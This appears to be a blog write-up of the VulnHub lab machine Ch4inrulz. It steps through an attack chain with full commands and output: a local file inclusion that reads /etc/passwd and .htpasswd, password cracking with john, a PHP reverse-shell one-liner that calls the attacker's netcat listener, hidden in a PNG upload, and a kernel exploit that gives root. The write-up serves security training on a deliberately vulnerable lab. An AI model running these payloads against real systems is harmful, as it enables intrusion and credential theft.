Posted on by

Ch4inrulz 1.0.1 – Writeup

Details

This machine is https://www.vulnhub.com/entry/ch4inrulz-101,247/

Recon Phase

Starting with a discovery scan

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00045s latency).
MAC Address: 0A:00:27:00:00:19 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0015s latency).
MAC Address: 08:00:27:86:71:8D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.0013s latency).
MAC Address: 08:00:27:53:54:9D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.19 seconds

Then service discovery

root@kali:~# nmap -sV 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:53:54:9D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

And then some ran some scripts against the services

root@kali:~# nmap -sC 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.56.102
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh
| ssh-hostkey:
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http
|_http-title: FRANK's Website | Under development
8011/tcp open  unknown
MAC Address: 08:00:27:53:54:9D (Oracle VirtualBox virtual NIC)

Shell Hunting

I first checked out the ftp server as it says it allows anon login, so in browser I went to ftp://192.168.56.101

Screenshot 1

From here I went to the first webserver on http://192.168.56.101

Screenshot 2

And then setup dirbuster on it

Screenshot 3

Screenshot 4

The development section caught my attention so I checked it out at http://192.168.56.101/development/

Screenshot 5

It had basic http auth, but I had no creds so I moved onto webserver #2 on http://192.168.56.101:8011/

Screenshot 6

And then dirbuster

Screenshot 7

Screenshot 8

So I went to the api section http://192.168.56.101:8011/api/

Screenshot 9

I went to each of those files in turn, but only files_api.php returned anything

Screenshot 10

As it says it needs a file, I tried including /etc/passwd by going to http://192.168.56.101:8011/api/files_api.php?file=etc/passwd

Screenshot 11

This didn’t work, but I realised it never specified it wanted a GET request, so I used curl to try POST

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/etc/passwd"
<head>
  <title>franks website | simple website browser API</title>
</head>
root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

This worked, so I now had LFI and some details. The main piece of information is the username frank. From here I carried on using the LFI to try and find the location of the other webserver on the server itself, eventually I found it was

/var/www/index.html

Which I included to check

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/index.html"
[SNIP]

Now knowing the location of the server, I wanted to get things from inside the /development folder

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/development/index.html"
<head>
  <title>franks website | simple website browser API</title>
</head>
<title>my Development tools</title>
<b>* Here is my unfinished tools list</b>
<h4>- the uploader tool (finished but need security review)</h4>

Now as I knew it was using http basic auth which is normally setup in .htaccess so I tried to include that

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/development/.htaccess"
<head>
  <title>franks website | simple website browser API</title>
</head>
AuthUserFile /etc/.htpasswd
AuthName "Frank Development Area"
AuthType Basic
AuthGroupFile /dev/null
<Limit GET POST>
require valid-user
</Limit>

This gave me the location of the auth file which I then read

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/etc/.htpasswd"
<head>
  <title>franks website | simple website browser API</title>
</head>
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

I now had a username and has, which I put in a file called hash.txt

frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

To crack this hash, I used john

root@kali:~# john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!!         (frank)
1g 0:00:00:00 DONE 1/3 (2018-09-13 12:28) 25.00g/s 4700p/s 4700c/s 4700C/s frank!!..fr4nk
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I could now log into the development section with frank:frank!!!, so I went over to it http://192.168.56.101/development/

This page mentioned an uploader, which I found on http://192.168.56.101/development/uploader/

Screenshot 12

From this I can upload a fake image containing php and LFI it in to get the code run. First I wanted a real png in the hopes it will bypass checks on images files, so I grabbed a small png from wiki

root@kali:~# wget https://upload.wikimedia.org/wikipedia/en/7/7a/Scorpions.png
--2018-09-13 15:55:18--  https://upload.wikimedia.org/wikipedia/en/7/7a/Scorpions.png
Resolving upload.wikimedia.org (upload.wikimedia.org)... 91.198.174.208, 2620:0:862:ed1a::2:b
Connecting to upload.wikimedia.org (upload.wikimedia.org)|91.198.174.208|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1171 (1.1K) [image/png]
Saving to: ‘Scorpions.png’
Scorpions.png       100%[===================>]   1.14K  --.-KB/s    in 0s
2018-09-13 15:55:18 (21.1 MB/s) - ‘Scorpions.png’ saved [1171/1171]

I then added some php to open a reverse shell at the end of the file

root@kali:~# echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 4444 >/tmp/f') ?>" >> Scorpions.png

Which I then selected and uploaded

Screenshot 13

Lucky I used a real file as it tried to verify the file was an image using it’s mime type. Now the text said it was uploaded to an uploads folder which I hadn’t found yet. I dug around for a bit before found something interesting

Screenshot 14

The user likes patterns, and most things so far have been in the format of

frank{name}

so I tried a few variations of it under http://192.168.56.101/development/uploader

frankupload
franksupload
frankuploads
franksuploads
FrankUpload
FranksUpload
FranksUpoloads

None worked, but I eventually got to

FRANKuploads

Screenshot 15

Having found the file I was ready to include it, so I setup a listener

root@kali:~# nc -nvlp 4444

And included the image

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/development/uploader/FRANKuploads/Scorpions.png"

Checking back on the listener

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 50308
/bin/sh: can't access tty; job control turned off
$

I now had a shell

Route to Root

With a shell in place, I used python to upgrade it

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/anotherwww/api$

Now, I knew about franks home dir so I went over there first

www-data@ubuntu:/var/anotherwww/api$ cd /home/frank
www-data@ubuntu:/home/frank$ ls -la
drwxr-xr-x 3 frank frank 4096 Apr 14 07:37 .
drwxr-xr-x 3 root  root  4096 Apr 13 16:06 ..
-rw------- 1 frank frank   26 Jul 31 07:44 .bash_history
-rw-r--r-- 1 frank frank  220 Apr 13 16:06 .bash_logout
-rw-r--r-- 1 frank frank 3353 Apr 13 16:06 .bashrc
drwxr-xr-x 2 frank frank 4096 Apr 13 16:07 .cache
-rw-r--r-- 1 frank frank  675 Apr 13 16:06 .profile
-rw-r--r-- 1 frank frank    0 Apr 13 16:08 .sudo_as_admin_successful
-rw-r--r-- 1 frank frank   29 Apr 14 07:37 PE.txt
-rw-r--r-- 1 frank frank   33 Apr 14 07:36 user.txt

There was the user flag, and a file called PE, now PE contained nothing which helped me in this machine, but I grabbed the user flag

www-data@ubuntu:/home/frank$ cat user.txt
4795aa2a9be22fac10e1c25794e75c1b

I went looking for potential exploits against this machine

www-data@ubuntu:/home/frank$ uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux

Now this was a pretty out of date kernel, so I knew I would be able to find an exploit for it, I settled on https://www.exploit-db.com/exploits/15285/, which I downloaded onto my kali machine, ready to transfer onto the target (as I keep my target machines isolated to a virtual network I could not download the exploit directly too it)

root@kali:~# wget https://www.exploit-db.com/download/15285.c
--2018-09-13 16:27:56--  https://www.exploit-db.com/download/15285.c
Resolving www.exploit-db.com (www.exploit-db.com)... 62.24.151.225, 62.24.138.17
Connecting to www.exploit-db.com (www.exploit-db.com)|62.24.151.225|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [application/txt]
Saving to: ‘15285.c’
15285.c                           100%[===========================================================>]   6.99K  --.-KB/s    in 0s
2018-09-13 16:27:59 (366 MB/s) - ‘15285.c’ saved [7155/7155]

I then used netcat to transfer it

root@kali:~# nc -nvlp 2222 < 15285.c

Then on the target

www-data@ubuntu:/home/frank$ cd /tmp
www-data@ubuntu:/tmp$ nc 192.168.56.102 2222 > exploit.c

I confirmed it had transfered

www-data@ubuntu:/tmp$ ls -la
drwxrwxrwt  2 root     root      4096 Sep 13 14:24 .
drwxr-xr-x 22 root     root      4096 Apr 13 16:10 ..
-rw-r--r--  1 www-data www-data 7155 Sep 13 14:24 exploit.c

Compiled the exploit

www-data@ubuntu:/tmp$ gcc exploit.c -o exploit

Checked that the file was there

www-data@ubuntu:/tmp$ ls -la
drwxrwxrwt  2 root     root      4096 Sep 13 14:26 .
drwxr-xr-x 22 root     root      4096 Apr 13 16:10 ..
-rwxr-xr-x  1 www-data www-data 14022 Sep 13 14:26 exploit
-rw-r--r--  1 www-data www-data 7155 Sep 13 14:24 exploit.c

And finally, ran the exploit

www-data@ubuntu:/tmp$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
#

This spawned a root shell, so I went to get the flag

# cd /root
# ls -la
drwx------  4 root root 4096 Apr 14 07:36 .
drwxr-xr-x 22 root root 4096 Apr 13 16:10 ..
drwx------  2 root root 4096 Apr 13 16:06 .aptitude
-rw-------  1 root root   82 Jul 31 07:44 .bash_history
-rw-r--r--  1 root root 3106 Apr 23  2010 .bashrc
drwxr-xr-x  2 root root 4096 Apr 14 07:32 .cache
-rw-r--r--  1 root root  140 Apr 23  2010 .profile
-rw-r--r--  1 root root   33 Apr 14 07:36 root.txt
# cat root.txt
8f420533b79076cc99e9f95a1a4e5568

And the machine was done!

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.